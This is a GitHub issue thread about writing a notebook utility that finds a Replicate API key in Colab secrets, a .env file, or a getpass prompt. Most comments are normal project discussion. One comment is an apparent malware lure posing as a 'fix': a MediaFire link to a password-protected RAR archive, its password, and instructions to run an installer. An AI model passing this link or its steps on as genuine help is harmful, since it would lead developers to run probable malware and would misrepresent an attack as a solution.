### ISSUE TITLE
[Recipe block] Reference API Key in a Recipe.

### ISSUE THREAD

**Issue by fayvor** [ibm-granite-cookbooks/pm#102]
Write a code block for use in recipes that checks for an API key in the following places:

- colab keys
- `.env` file (local file for in vs code)
- input prompt (`getpass.getpass()`)

How can we make notebooks work well with all 3 approaches for secret management with minimal additional annoying config?

This could be a standard utility function.  Can we auto-detect and/or configure which one to try, or do we need to establish a standard sequence for checking the availability of these three options?  Is there some obvious or standard approach to this that we're missing?

Let's keep the scope to the Replicate API key in the Getting Started recipe for now.  We will tackle the platform selection issue separately.

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rawkintrevo** [comment]
https://colab.research.google.com/drive/1CfNPXZ1xy4QOAy_EW5GoLbovsFQu3nR5?usp=sharing

**Comment by rawkintrevo** [comment]
Blocked on where to put this / should we change this?

**Comment by adampingel** [comment]
We'll consider this done, with follow-on work to make use of it in #116
